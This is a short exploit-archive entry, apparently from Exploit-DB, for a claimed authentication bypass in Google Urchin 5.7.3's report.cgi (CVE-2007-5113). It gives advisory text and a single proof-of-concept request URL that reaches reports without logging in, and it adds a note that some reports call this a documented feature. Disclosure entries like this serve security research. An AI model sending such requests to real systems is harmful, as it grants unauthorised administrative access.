[] NeoSense

Google Urchin 5.7.3 - 'Report.cgi' Authentication Bypass

Author: MustLive
type: webapps
platform: cgi
port: 
date_added: 2007-10-11 
date_updated: 2014-01-02 
verified: 1 
codes: CVE-2007-5113;OSVDB-42334 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/26037/info

Google Urchin is prone to an authentication-bypass vulnerability.

An attacker can exploit this issue to gain administrative access to the vulnerable application. This may lead to other attacks.

Urchin 5.7.03 is vulnerable to this issue; other versions may also be affected.

NOTE: Further reports suggest that this is not a vulnerability, but a documented feature of the application.

http://www.example.com/report.cgi?profile=x&rid=42&prefs=x&n=10&vid=1301&bd=20070703&ed=20070703&dt=4&gtype=5